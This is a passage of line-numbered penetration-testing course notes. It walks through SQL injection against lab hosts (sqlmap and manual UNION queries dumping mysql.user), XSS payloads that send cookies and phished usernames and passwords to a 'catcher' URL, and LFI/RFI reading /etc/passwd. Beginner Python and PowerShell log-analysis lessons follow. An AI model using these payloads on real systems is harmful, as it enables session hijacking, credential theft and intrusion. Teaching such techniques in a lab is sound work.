2107python sqlmap.py -u "http://54.245.184.121/bookdetail.aspx?id=2" --users --passwords
2108
2109 #######################
2110# Attacking PHP/MySQL #
2111#######################
2112
2113Go to LAMP Target homepage
2114http://45.63.104.73/
2115
2116
2117
2118Clicking on the Acer Link:
2119http://45.63.104.73/acre2.php?lap=acer
2120
2121 - Found parameter passing (answer yes to question 1)
2122 - Insert ' to test for SQLI
2123
2124http://45.63.104.73/acre2.php?lap=acer'
2125
2126
2127Page returns the following error:
2128You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''acer''' at line 1
2129
2130
2131
2132In order to perform union-based sql injection - we must first determine the number of columns in this query.
2133We do this using the ORDER BY
2134http://45.63.104.73/acre2.php?lap=acer' order by 100-- +
2135
2136Page returns the following error:
2137Unknown column '100' in 'order clause'
2138
2139
2140
2141http://45.63.104.73/acre2.php?lap=acer' order by 50-- +
2142
2143Page returns the following error:
2144Unknown column '50' in 'order clause'
2145
2146
2147
2148http://45.63.104.73/acre2.php?lap=acer' order by 25-- +
2149Page returns the following error:
2150Unknown column '25' in 'order clause'
2151
2152
2153
2154http://45.63.104.73/acre2.php?lap=acer' order by 12-- +
2155
2156Page returns the following error:
2157Unknown column '50' in 'order clause'
2158
2159
2160
2161http://45.63.104.73/acre2.php?lap=acer' order by 6-- +
2162---Valid page returned for 5 and 6...error on 7 so we know there are 6 columns
2163
2164
2165
2166Now we build out the union all select statement with the correct number of columns
2167
2168Reference:
2169http://www.techonthenet.com/sql/union.php
2170
2171
2172
2173http://45.63.104.73/acre2.php?lap=acer' union all select 1,2,3,4,5,6-- +
2174
2175
2176
2177Now we negate the parameter value 'acer' by turning into the word 'null':
2178http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,4,5,6-- j
2179
2180We see that a 4 and a 5 are on the screen. These are the columns that will echo back data
2181
2182
2183Use a cheat sheet for syntax:
2184http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
2185
2186
2187http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),5,6-- j
2188
2189http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),version(),6-- j
2190
2191http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),@@version,6-- +
2192
2193http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),@@datadir,6-- +
2194
2195
2196http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user,password,6 from mysql.user -- a
2197
2198
2199
2200
2201Sometimes students ask about the "-- j" or "-- +" that I append to SQL injection attack string.
2202
2203Here is a good reference for it:
2204https://www.symantec.com/connect/blogs/mysql-injection-comments-comments
2205
2206Both attackers and penetration testers alike often forget that MySQL comments deviate from the standard ANSI SQL specification. The double-dash comment syntax was first supported in MySQL 3.23.3. However, in MySQL a double-dash comment "requires the second dash to be followed by at least one whitespace or control character (such as a space, tab, newline, and so on)." This double-dash comment syntax deviation is intended to prevent complications that might arise from the subtraction of negative numbers within SQL queries. Therefore, the classic SQL injection exploit string will not work against backend MySQL databases because the double-dash will be immediately followed by a terminating single quote appended by the web application. However, in most cases a trailing space needs to be appended to the classic SQL exploit string. For the sake of clarity we'll append a trailing space and either a "+" or a letter.
2207
2208
2209###############################################################################
2210# What is XSS #
2211# https://s3.amazonaws.com/infosecaddictsfiles/2-Intro_To_XSS.pptx #
2212###############################################################################
2213
2214OK - what is Cross Site Scripting (XSS)
2215
22161. Use Firefox to browse to the following location:
2217
2218 http://45.63.104.73/xss_practice/
2219
2220 A really simple search page that is vulnerable should come up.
2221
2222
2223
2224
22252. In the search box type:
2226
2227 <script>alert('So this is XSS')</script>
2228
2229
2230 This should pop-up an alert window with your message in it proving XSS is in fact possible.
2231 Ok, click OK and then click back and go back to http://45.63.104.73/xss_practice/
2232
2233
22343. In the search box type:
2235
2236 <script>alert(document.cookie)</script>
2237
2238
2239 This should pop-up an alert window with your message in it proving XSS is in fact possible and your cookie can be accessed.
2240 Ok, click OK and then click back and go back to http://45.63.104.73/xss_practice/
2241
22424. Now replace that alert script with:
2243
2244 <script>document.location="http://45.63.104.73/xss_practice/cookie_catcher.php?c="+document.cookie</script>
2245
2246
2247This will actually pass your cookie to the cookie catcher that we have sitting on the webserver.
2248
2249
22505. Now view the stolen cookie at:
2251 http://45.63.104.73/xss_practice/cookie_stealer_logs.html
2252
2253
2254The cookie catcher writes to this file and all we have to do is make sure that it has permissions to be written to.
2255
2256
2257
2258
2259
2260
2261############################
2262# A Better Way To Demo XSS #
2263############################
2264
2265
2266Let's take this to the next level. We can modify this attack to include some username/password collection. Paste all of this into the search box.
2267
2268
2269Use Firefox to browse to the following location:
2270
2271 http://45.63.104.73/xss_practice/
2272
2273
2274
2275Paste this in the search box
2276----------------------------
2277
2278
2279Option 1
2280--------
2281
2282<script>
2283password=prompt('Your session is expired. Please enter your password to continue',' ');
2284document.write("<img src=\"http://45.63.104.73/xss_practice/passwordgrabber.php?password=" +password+"\">");
2285</script>
2286
2287
2288Now view the stolen cookie at:
2289 http://45.63.104.73/xss_practice/passwords.html
2290
2291
2292
2293Option 2
2294--------
2295<script>
2296username=prompt('Please enter your username',' ');
2297password=prompt('Please enter your password',' ');
2298document.write("<img src=\"http://45.63.104.73/xss_practice/unpw_catcher.php?username="+username+"&password="+password+"\">");
2299</script>
2300
2301
2302
2303
2304Now view the stolen cookie at:
2305http://45.63.104.73/xss_practice/username_password_logs.html
2306
2307
2308
2309
2310#########################################
2311# Let's try a local file include (LFI) #
2312#########################################
2313- Here is an example of an LFI
2314- Open this page in Firefox:
2315http://45.63.104.73/showfile.php?filename=contactus.txt
2316
2317- Notice the page name (showfile.php) and the parameter name (filename) and the filename (contactus.txt)
2318- Here you see a direct reference to a file on the local filesystem of the victim machine.
2319- You can attack this by doing the following:
2320http://45.63.104.73/showfile.php?filename=/etc/passwd
2321
2322- This is an example of a Local File Include (LFI), to change this attack into a Remote File Include (RFI) you need some content from
2323- somewhere else on the Internet. Here is an example of a text file on the web:
2324http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt
2325
2326- Now we can attack the target via RFI like this:
2327http://45.63.104.73/showfile.php?filename=http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt
2328
2329
2330
2331
2332###############################
2333# How much fuzzing is enough? #
2334###############################
2335There really is no exact science for determining the correct amount of fuzzing per parameter to do before moving on to something else.
2336
2337Here are the steps that I follow when I'm testing (my mental decision tree) to figure out how much fuzzing to do.
2338
2339
2340Step 1: Ask yourself the 3 questions per page of the site.
2341
2342Step 2: If the answer is yes, then go down that particular attack path with a few fuzz strings (I usually do 10-20 fuzz strings per parameter)
2343
2344Step 3: When you load your fuzz strings - use the following decision tree
2345
2346 - Are the fuzz strings causing a default error message (example 404)?
2347 - If this is the case then it is most likely NOT vulnerable
2348
2349 - Are the fuzz strings causing a WAF or LB custom error message?
2350 - If this is the case then you need to find an encoding method to bypass
2351
2352
2353 - Are the fuzz strings causing an error message that discloses the backend type?
2354 - If yes, then identify DB type and find correct syntax to successfully exploit
2355 - Some example strings that I use are:
2356 '
2357 "
2358 () <----- Take the parameter value and put it in parenthesis
2359 (5-1) <----- See if you can perform an arithmetic function
2360
2361
2362 - Are the fuzz strings rendering executable code?
2363 - If yes, then report XSS/CSRF/Response Splitting/Request Smuggling/etc
2364 - Some example strings that I use are:
2365 <b>hello</b>
2366 <u>hello</u>
2367 <script>alert(123);</script>
2368 <script>alert(xss);</script>
2369 <script>alert('xss');</script>
2370 <script>alert("xss");</script>
2371
2372
2373
2374
2375#################
2376# Log Analysis #
2377#################
2378
2379VM for these labs
2380-----------------
2381- InfoSec Addicts Ubuntu Virtual Machine
2382https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
2383user: infosecaddicts
2384pass: infosecaddicts
2385
2386
2387- Windows 7 Virtual Machine
2388https://s3.amazonaws.com/infosecaddictsvirtualmachines/Win7x64.zip
2389user: workshop
2390pass: password
2391
2392
2393
2394
2395##############################################
2396# Log Analysis with Linux command-line tools #
2397##############################################
2398The following command line executables are found in the Mac as well as most Linux Distributions.
2399
2400cat – prints the content of a file in the terminal window
2401grep – searches and filters based on patterns
2402awk – can sort each row into fields and display only what is needed
2403sed – performs find and replace functions
2404sort – arranges output in an order
2405uniq – compares adjacent lines and can report, filter or provide a count of duplicates
2406
2407
2408
2409
2410##############
2411# Cisco Logs #
2412##############
2413
2414---------------------------Type This-----------------------------------
2415
2416wget https://s3.amazonaws.com/infosecaddictsfiles/cisco.log
2417-----------------------------------------------------------------------
2418
2419
2420AWK Basics
2421----------
2422To quickly demonstrate the print feature in awk, we can instruct it to show only the 5th word of each line. Here we will print $5. Only the last 4 lines are being shown for brevity.
2423
2424---------------------------Type This-----------------------------------
2425
2426cat cisco.log | awk '{print $5}' | tail -n 4
2427-----------------------------------------------------------------------
2428
2429
2430
2431
2432Looking at a large file would still produce a large amount of output. A more useful thing to do might be to output every entry found in "$5", group them together, count them, then sort them from the greatest to least number of occurrences. This can be done by piping the output through "sort", using "uniq -c" to count the like entries, then using "sort -rn" to sort it in reverse order.
2433
2434---------------------------Type This-----------------------------------
2435
2436cat cisco.log | awk '{print $5}'| sort | uniq -c | sort -rn
2437-----------------------------------------------------------------------
2438
2439
2440
2441
2442While that's sort of cool, it is obvious that we have some garbage in our output. Evidently we have a few lines that aren't conforming to the output we expect to see in $5. We can insert grep to filter the file prior to feeding it to awk. This insures that we are at least looking at lines of text that contain "facility-level-mnemonic".
2443
2444---------------------------Type This-----------------------------------
2445
2446cat cisco.log | grep %[a-zA-Z]*-[0-9]-[a-zA-Z]* | awk '{print $5}' | sort | uniq -c | sort -rn
2447-----------------------------------------------------------------------
2448
2449
2450
2451
2452
2453Now that the output is cleaned up a bit, it is a good time to investigate some of the entries that appear most often. One way to see all occurrences is to use grep.
2454
2455---------------------------Type This-----------------------------------
2456
2457cat cisco.log | grep %LINEPROTO-5-UPDOWN:
2458
2459cat cisco.log | grep %LINEPROTO-5-UPDOWN:| awk '{print $10}' | sort | uniq -c | sort -rn
2460
2461cat cisco.log | grep %LINEPROTO-5-UPDOWN:| sed 's/,//g' | awk '{print $10}' | sort | uniq -c | sort -rn
2462
2463cat cisco.log | grep %LINEPROTO-5-UPDOWN:| sed 's/,//g' | awk '{print $10 " changed to " $14}' | sort | uniq -c | sort -rn
2464-----------------------------------------------------------------------
2465
2466
2467
2468
2469#################################
2470# Using Python for log analysis #
2471#################################
2472
2473
2474
2475
2476###########################################
2477# Python Basics Lesson 1: Simple Printing #
2478###########################################
2479
2480---------------------------Type This-----------------------------------
2481
2482>>> print 1
2483
2484>>> print hello
2485
2486>>> print "hello"
2487
2488>>> print "Today we are learning Python."
2489-----------------------------------------------------------------------
2490
2491
2492
2493###################################################
2494# Python Basics Lesson 2: Simple Numbers and Math #
2495###################################################
2496
2497---------------------------Type This-----------------------------------
2498
2499>>> 2+2
2500
2501>>> 6-3
2502
2503>>> 18/7
2504
2505>>> 18.0/7
2506
2507>>> 18.0/7.0
2508
2509>>> 18/7
2510
2511>>> 9%4
2512
2513>>> 8%4
2514
2515>>> 8.75%.5
2516
2517>>> 6.*7
2518
2519>>> 6*6*6
2520
2521>>> 6**3
2522
2523>>> 5**12
2524
2525>>> -5**4
2526
2527-----------------------------------------------------------------------
2528
2529
2530
2531
2532
2533#####################################
2534# Python Basics Lesson 3: Variables #
2535#####################################
2536
2537---------------------------Type This-----------------------------------
2538
2539>>> x=18
2540
2541>>> x+15
2542
2543>>> x**3
2544
2545>>> y=54
2546
2547>>> x+y
2548
2549>>> age=input("Enter number here: ")
2550 43
2551
2552>>> age+32
2553
2554>>> age**3
2555
2556>>> fname = raw_input("Enter your first name: ")
2557
2558>>> lname = raw_input("Enter your first name: ")
2559
2560>>> fname = raw_input("Enter your name: ")
2561Enter your name: Joe
2562
2563>>> lname = raw_input("Enter your name: ")
2564Enter your name: McCray
2565
2566>>> print fname
2567Joe
2568
2569>>> print lname
2570McCray
2571
2572>>> print fname lname
2573
2574>>> print fname+lname
2575JoeMcCray
2576-----------------------------------------------------------------------
2577
2578
2579
2580NOTE:
2581Use "input() for integers and expressions, and use raw_input() when you are dealing with strings.
2582
2583
2584
2585
2586
2587#################################################
2588# Python Basics Lesson 4: Modules and Functions #
2589#################################################
2590
2591---------------------------Type This-----------------------------------
2592
2593>>> 5**4
2594
2595>>> pow(5,4)
2596
2597>>> abs(-18)
2598
2599>>> abs(5)
2600
2601>>> floor(18.7)
2602
2603>>> import math
2604
2605>>> math.floor(18.7)
2606
2607>>> math.sqrt(81)
2608
2609>>> joe = math.sqrt
2610
2611>>> joe(9)
2612
2613>>> joe=math.floor
2614
2615>>> joe(19.8)
2616
2617-----------------------------------------------------------------------
2618
2619
2620
2621
2622
2623
2624
2625
2626###################################
2627# Python Basics Lesson 5: Strings #
2628###################################
2629
2630---------------------------Type This-----------------------------------
2631
2632>>> "XSS"
2633
2634>>> 'SQLi'
2635
2636>>> "Joe's a python lover"
2637
2638>>> 'Joe\'s a python lover'
2639
2640>>> "Joe said \"InfoSec is fun\" to me"
2641
2642>>> a = "Joe"
2643
2644>>> b = "McCray"
2645
2646>>> a, b
2647
2648>>> a+b
2649
2650-----------------------------------------------------------------------
2651
2652
2653
2654
2655
2656
2657
2658########################################
2659# Python Basics Lesson 6: More Strings #
2660########################################
2661
2662---------------------------Type This-----------------------------------
2663
2664>>> num = 10
2665
2666>>> num + 2
2667
2668>>> "The number of open ports found on this system is " + num
2669
2670>>> num = str(18)
2671
2672>>> "There are " + num + " vulnerabilities found in this environment."
2673
2674>>> num2 = 46
2675
2676>>> "As of 08/20/2012, the number of states that enacted the Security Breach Notification Law is " + `num2`
2677-----------------------------------------------------------------------
2678
2679
2680
2681NOTE:
2682Use "input() for integers and expressions, and use raw_input() when you are dealing with strings.
2683
2684
2685
2686
2687
2688
2689
2690###############################################
2691# Python Basics Lesson 7: Sequences and Lists #
2692###############################################
2693
2694---------------------------Type This-----------------------------------
2695
2696>>> attacks = ['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting', 'Remote File Include']
2697
2698>>> attacks
2699['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting', 'Remote File Include']
2700
2701>>> attacks[3]
2702'SQL Injection'
2703
2704>>> attacks[-2]
2705'Cross-Site Scripting'
2706-----------------------------------------------------------------------
2707
2708
2709
2710
2711
2712
2713########################################
2714# Python Basics Level 8: If Statement #
2715########################################
2716
2717---------------------------Type This-----------------------------------
2718
2719>>> attack="SQLI"
2720>>> if attack=="SQLI":
2721 print 'The attacker is using SQLI'
2722
2723>>> attack="XSS"
2724>>> if attack=="SQLI":
2725 print 'The attacker is using SQLI'
2726-----------------------------------------------------------------------
2727
2728
2729#############################
2730# Reference Videos To Watch #
2731#############################
2732Here is your first set of youtube videos that I'd like for you to watch:
2733https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 1-10)
2734
2735
2736
2737
2738
2739#####################################
2740# Lesson 9: Intro to Log Analysis #
2741#####################################
2742
2743Login to your StrategicSec Ubuntu machine. You can download the VM from the following link:
2744
2745- InfoSec Addicts Ubuntu Virtual Machine
2746https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
2747user: infosecaddicts
2748pass: infosecaddicts
2749
2750
2751
2752Then execute the following commands:
2753
2754---------------------------Type This-----------------------------------
2755
2756
2757wget https://s3.amazonaws.com/infosecaddictsfiles/access_log
2758
2759
2760cat access_log | grep 141.101.80.188
2761
2762cat access_log | grep 141.101.80.187
2763
2764cat access_log | grep 108.162.216.204
2765
2766cat access_log | grep 173.245.53.160
2767
2768---------------------------------------------------------
2769
2770Google the following terms:
2771 - Python read file
2772 - Python read line
2773 - Python read from file
2774
2775
2776
2777
2778########################################################
2779# Lesson 10: Use Python to read in a file line by line #
2780########################################################
2781
2782
2783Reference:
2784http://cmdlinetips.com/2011/08/three-ways-to-read-a-text-file-line-by-line-in-python/
2785
2786
2787
2788
2789
2790
2791Let's have some fun.....
2792
2793---------------------------Type This-----------------------------------
2794
2795>>> f = open('access_log', "r")
2796
2797>>> lines = f.readlines()
2798
2799>>> print lines
2800
2801>>> lines[0]
2802
2803>>> lines[10]
2804
2805>>> lines[50]
2806
2807>>> lines[1000]
2808
2809>>> lines[5000]
2810
2811>>> lines[10000]
2812
2813>>> print len(lines)
2814
2815
2816
2817
2818
2819
2820
2821
2822
2823---------------------------Type This-----------------------------------
2824vi logread1.py
2825
2826---------------------------Paste This-----------------------------------
2827
2828## Open the file with read only permit
2829f = open('access_log', "r")
2830
2831## use readlines to read all lines in the file
2832## The variable "lines" is a list containing all lines
2833lines = f.readlines()
2834
2835print lines
2836
2837
2838## close the file after reading the lines.
2839f.close()
2840
2841---------------------------------------------------------
2842
2843
2844Google the following:
2845 - python difference between readlines and readline
2846 - python readlines and readline
2847
2848
2849
2850
2851
2852#################################
2853# Lesson 11: A quick challenge #
2854#################################
2855
2856Can you write an if/then statement that looks for this IP and print "Found it"?
2857
2858
2859141.101.81.187
2860
2861
2862
2863
2864
2865
2866---------------------------------------------------------
2867Hint 1: Use Python to look for a value in a list
2868
2869Reference:
2870http://www.wellho.net/mouth/1789_Looking-for-a-value-in-a-list-Python.html
2871
2872
2873
2874
2875---------------------------------------------------------
2876Hint 2: Use Python to prompt for user input
2877
2878Reference:
2879http://www.cyberciti.biz/faq/python-raw_input-examples/
2880
2881
2882
2883
2884---------------------------------------------------------
2885Hint 3: Use Python to search for a string in a list
2886
2887Reference:
2888http://stackoverflow.com/questions/4843158/check-if-a-python-list-item-contains-a-string-inside-another-string
2889
2890
2891
2892
2893
2894Here is my solution:
2895-------------------
2896$ python
2897>>> f = open('access_log', "r")
2898>>> lines = f.readlines()
2899>>> ip = '141.101.81.187'
2900>>> for string in lines:
2901... if ip in string:
2902... print(string)
2903
2904
2905
2906
2907Here is one student's solution - can you please explain each line of this code to me?
2908-------------------------------------------------------------------------------------
2909#!/usr/bin/python
2910
2911f = open('access_log')
2912
2913strUsrinput = raw_input("Enter IP Address: ")
2914
2915for line in iter(f):
2916 ip = line.split(" - ")[0]
2917 if ip == strUsrinput:
2918 print line
2919
2920f.close()
2921
2922
2923
2924
2925-------------------------------
2926
2927Working with another student after class we came up with another solution:
2928
2929#!/usr/bin/env python
2930
2931
2932# This line opens the log file
2933f=open('access_log',"r")
2934
2935# This line takes each line in the log file and stores it as an element in the list
2936lines = f.readlines()
2937
2938
2939# This lines stores the IP that the user types as a var called userinput
2940userinput = raw_input("Enter the IP you want to search for: ")
2941
2942
2943
2944# This combination for loop and nested if statement looks for the IP in the list called lines and prints the entire line if found.
2945for ip in lines:
2946 if ip.find(userinput) != -1:
2947 print ip
2948
2949
2950
2951##################################################
2952# Lesson 12: Look for web attacks in a log file #
2953##################################################
2954
2955In this lab we will be looking at the scan_log.py script and it will scan the server log to find out common hack attempts within your web server log.
2956Supported attacks:
29571. SQL Injection
29582. Local File Inclusion
29593. Remote File Inclusion
29604. Cross-Site Scripting
2961
2962
2963---------------------------Type This-----------------------------------
2964
2965wget https://s3.amazonaws.com/infosecaddictsfiles/scan_log.py
2966-----------------------------------------------------------------------
2967
2968- The usage for scan_log.py is simple. You feed it an apache log file.
2969
2970---------------------------Type This-----------------------------------
2971
2972cat scan_log.py | less (use your up/down arrow keys to look through the file)
2973-----------------------------------------------------------------------
2974
2975
2976
2977
2978
2979################################
2980# Log Analysis with Powershell #
2981################################
2982
2983VM for these labs
2984-----------------
2985https://s3.amazonaws.com/infosecaddictsvirtualmachines/Win7x64.zip
2986 username: workshop
2987 password: password
2988
2989
2990You can do the updates in the Win7 VM (yes, it is a lot of updates).
2991
2992You'll need to create directory in the Win7 VM called "c:\ps"
2993
2994#####################
2995# Powershell Basics #
2996#####################
2997
2998PowerShell is Microsoft's new scripting language that has been built in since the release Vista.
2999
3000PowerShell file extension end in .ps1 .
3001
3002An important note is that you cannot double click on a PowerShell script to execute it.
3003
3004To open a PowerShell command prompt either hit Windows Key + R and type in PowerShell or Start -> All Programs -> Accessories -> Windows PowerShell -> Windows PowerShell.
3005
3006---------------------------Type This-----------------------------------
3007
3008dir
3009cd
3010ls
3011cd c:\
3012-----------------------------------------------------------------------
3013
3014
3015To obtain a list of cmdlets, use the Get-Command cmdlet
3016
3017---------------------------Type This-----------------------------------
3018
3019Get-Command
3020-----------------------------------------------------------------------
3021
3022
3023
3024You can use the Get-Alias cmdlet to see a full list of aliased commands.
3025
3026---------------------------Type This-----------------------------------
3027
3028Get-Alias
3029-----------------------------------------------------------------------
3030
3031
3032
3033Don't worry you won't blow up your machine with Powershell
3034
3035---------------------------Type This-----------------------------------
3036
3037Get-Process | stop-process What will this command do?
3038Get-Process | stop-process -whatif
3039-----------------------------------------------------------------------
3040
3041
3042To get help with a cmdlet, use the Get-Help cmdlet along with the cmdlet you want information about.
3043
3044---------------------------Type This-----------------------------------
3045
3046Get-Help Get-Command
3047
3048Get-Help Get-Service –online
3049
3050Get-Service -Name TermService, Spooler
3051
3052Get-Service –N BITS
3053
3054Start-Transcript
3055-----------------------------------------------------------------------
3056
3057PowerShell variables begin with the $ symbol. First lets create a variable
3058
3059---------------------------Type This-----------------------------------
3060
3061$serv = Get-Service –N Spooler
3062-----------------------------------------------------------------------
3063
3064To see the value of a variable you can just call it in the terminal.
3065
3066---------------------------Type This-----------------------------------
3067
3068$serv
3069
3070$serv.gettype().fullname
3071-----------------------------------------------------------------------
3072
3073
3074Get-Member is another extremely useful cmdlet that will enumerate the available methods and properties of an object. You can pipe the object to Get-Member or pass it in
3075
3076---------------------------Type This-----------------------------------
3077
3078$serv | Get-Member
3079
3080Get-Member -InputObject $serv
3081-----------------------------------------------------------------------
3082
3083
3084
3085
3086
3087Let's use a method and a property with our object.
3088
3089---------------------------Type This-----------------------------------
3090
3091$serv.Status
3092$serv.Stop()
3093$serv.Refresh()
3094$serv.Status
3095$serv.Start()
3096$serv.Refresh()
3097$serv.Status
3098-----------------------------------------------------------------------
3099
3100
3101
3102
3103Methods can return properties and properties can have sub properties. You can chain them together by appending them to the first call.
3104
3105
3106
3107#############################
3108# Simple Event Log Analysis #
3109#############################
3110
3111Step 1: Dump the event logs
3112---------------------------
3113The first thing to do is to dump them into a format that facilitates later processing with Windows PowerShell.
3114
3115To dump the event log, you can use the Get-EventLog and the Exportto-Clixml cmdlets if you are working with a traditional event log such as the Security, Application, or System event logs.
3116If you need to work with one of the trace logs, use the Get-WinEvent and the ExportTo-Clixml cmdlets.
3117
3118---------------------------Type This-----------------------------------
3119
3120Get-EventLog -LogName application | Export-Clixml Applog.xml
3121
3122type .\Applog.xml
3123
3124$logs = "system","application","security"
3125-----------------------------------------------------------------------
3126
3127The % symbol is an alias for the Foreach-Object cmdlet. It is often used when working interactively from the Windows PowerShell console
3128
3129---------------------------Type This-----------------------------------
3130
3131$logs | % { get-eventlog -LogName $_ | Export-Clixml "$_.xml" }
3132-----------------------------------------------------------------------
3133
3134
3135
3136Step 2: Import the event log of interest
3137----------------------------------------
3138To parse the event logs, use the Import-Clixml cmdlet to read the stored XML files.
3139Store the results in a variable.
3140Let's take a look at the commandlets Where-Object, Group-Object, and Select-Object.
3141
3142The following two commands first read the exported security log contents into a variable named $seclog, and then the five oldest entries are obtained.
3143
3144---------------------------Type This-----------------------------------
3145
3146$seclog = Import-Clixml security.xml
3147
3148$seclog | select -Last 5
3149-----------------------------------------------------------------------
3150
3151
3152Cool trick from one of our students named Adam. This command allows you to look at the logs for the last 24 hours:
3153
3154---------------------------Type This-----------------------------------
3155
3156Get-EventLog Application -After (Get-Date).AddDays(-1)
3157-----------------------------------------------------------------------
3158
3159You can use '-after' and '-before' to filter date ranges
3160
3161One thing you must keep in mind is that once you export the security log to XML, it is no longer protected by anything more than the NFTS and share permissions that are assigned to the location where you store everything.
3162By default, an ordinary user does not have permission to read the security log.
3163
3164
3165Step 3: Drill into a specific entry
3166-----------------------------------
3167To view the entire contents of a specific event log entry, choose that entry, send the results to the Format-List cmdlet, and choose all of the properties.
3168
3169---------------------------Type This-----------------------------------
3170
3171$seclog | select -first 1 | fl *
3172-----------------------------------------------------------------------
3173
3174The message property contains the SID, account name, user domain, and privileges that are assigned for the new login.
3175
3176---------------------------Type This-----------------------------------
3177
3178($seclog | select -first 1).message
3179
3180(($seclog | select -first 1).message).gettype()
3181
3182-----------------------------------------------------------------------
3183
3184
3185In the *nix world you often want a count of something (wc -l).
3186How often is the SeSecurityPrivilege privilege mentioned in the message property?
3187To obtain this information, pipe the contents of the security log to a Where-Object to filter the events, and then send the results to the Measure-Object cmdlet to determine the number of events:
3188
3189---------------------------Type This-----------------------------------
3190
3191$seclog | ? { $_.message -match 'SeSecurityPrivilege'} | measure
3192
3193-----------------------------------------------------------------------
3194
3195If you want to ensure that only event log entries return that contain SeSecurityPrivilege in their text, use Group-Object to gather the matches by the EventID property.
3196
3197---------------------------Type This-----------------------------------
3198
3199$seclog | ? { $_.message -match 'SeSecurityPrivilege'} | group eventid
3200-----------------------------------------------------------------------
3201
3202Because importing the event log into a variable from the stored XML results in a collection of event log entries, it means that the count property is also present.
3203Use the count property to determine the total number of entries in the event log.
3204
3205---------------------------Type This-----------------------------------
3206
3207$seclog.Count
3208-----------------------------------------------------------------------
3209
3210
3211
3212
3213
3214
3215############################
3216# Simple Log File Analysis #
3217############################
3218
3219
3220You'll need to create the directory c:\ps and download sample iss log http://pastebin.com/raw.php?i=LBn64cyA
3221
3222---------------------------Type This-----------------------------------
3223
3224mkdir c:\ps
3225cd c:\ps
3226(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=LBn64cyA", "c:\ps\u_ex1104.log")
3227-----------------------------------------------------------------------
3228
3229
3230
3231
3232
3233
3234
3235
3236###############################################
3237# Intrusion Analysis Using Windows PowerShell #
3238###############################################
3239
3240Download sample file http://pastebin.com/raw.php?i=ysnhXxTV into the c:\ps directory
3241
3242
3243
3244
3245---------------------------Type This-----------------------------------
3246
3247(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=ysnhXxTV", "c:\ps\CiscoLogFileExamples.txt")
3248
3249Select-String 192.168.208.63 .\CiscoLogFileExamples.txt
3250
3251-----------------------------------------------------------------------
3252
3253
3254
3255The Select-String cmdlet searches for text and text patterns in input strings and files. You can use it like Grep in UNIX and Findstr in Windows.
3256
3257---------------------------Type This-----------------------------------
3258
3259Select-String 192.168.208.63 .\CiscoLogFileExamples.txt | select line
3260
3261-----------------------------------------------------------------------
3262
3263
3264
3265To see how many connections are made when analyzing a single host, the output from that can be piped to another command: Measure-Object.
3266
3267---------------------------Type This-----------------------------------
3268
3269Select-String 192.168.208.63 .\CiscoLogFileExamples.txt | select line | Measure-Object
3270-----------------------------------------------------------------------
3271
3272
3273
3274To select all IP addresses in the file expand the matches property, select the value, get unique values and measure the output.
3275
3276---------------------------Type This-----------------------------------
3277
3278Select-String "\b(?:\d{1,3}\.){3}\d{1,3}\b" .\CiscoLogFileExamples.txt | select -ExpandProperty matches | select -ExpandProperty value | Sort-Object -Unique | Measure-Object
3279-----------------------------------------------------------------------
3280
3281
3282
3283Removing Measure-Object shows all the individual IPs instead of just the count of the IP addresses. The Measure-Object command counts the IP addresses.
3284
3285---------------------------Type This-----------------------------------
3286
3287Select-String "\b(?:\d{1,3}\.){3}\d{1,3}\b" .\CiscoLogFileExamples.txt | select -ExpandProperty matches | select -ExpandProperty value | Sort-Object -Unique
3288-----------------------------------------------------------------------
3289
3290
3291In order to determine which IP addresses have the most communication the last commands are removed to determine the value of the matches. Then the group command is issued on the piped output to group all the IP addresses (value), and then sort the objects by using the alias for Sort-Object: sort count –des.
3292This sorts the IP addresses in a descending pattern as well as count and deliver the output to the shell.
3293
3294---------------------------Type This-----------------------------------
3295
3296Select-String "\b(?:\d{1,3}\.){3}\d{1,3}\b" .\CiscoLogFileExamples.txt | select -ExpandProperty matches | select value | group value | sort count -des
3297-----------------------------------------------------------------------
3298
3299
3300
3301
3302
3303
3304##############################################
3305# Parsing Log files using windows PowerShell #
3306##############################################
3307
3308Download the sample IIS log http://pastebin.com/LBn64cyA
3309
3310---------------------------Type This-----------------------------------
3311
3312(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=LBn64cyA", "c:\ps\u_ex1104.log")
3313
3314Get-Content ".\*log" | ? { ($_ | Select-String "WebDAV")}
3315-----------------------------------------------------------------------
3316
3317
3318
3319The above command would give us all the WebDAV requests.
3320
3321To filter this to a particular user name, use the below command:
3322
3323---------------------------Type This-----------------------------------
3324
3325Get-Content ".\*log" | ? { ($_ | Select-String "WebDAV") -and ($_ | Select-String "OPTIONS")}
3326-----------------------------------------------------------------------
3327
3328
3329
3330Some more options that will be more commonly required :
3331
3332For Outlook Web Access : Replace WebDAV with OWA
3333
3334For EAS : Replace WebDAV with Microsoft-server-activesync
3335
3336For ECP : Replace WebDAV with ECP
3337
3338
3339
3340To find out the count of the EWS request we can go ahead and run the below command
3341
3342---------------------------Type This-----------------------------------
3343
3344(Get-Content ".\*log" | ? { ($_ | Select-String "WebDAV") -and ($_ | Select-String "Useralias")}).count
3345-----------------------------------------------------------------------
3346
3347
3348
3349
3350
3351
3352
3353################################
3354# Good references for WannaCry #
3355################################
3356
3357References:
3358
3359https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168
3360https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
3361https://joesecurity.org/reports/report-db349b97c37d22f5ea1d1841e3c89eb4.html
3362
3363
3364
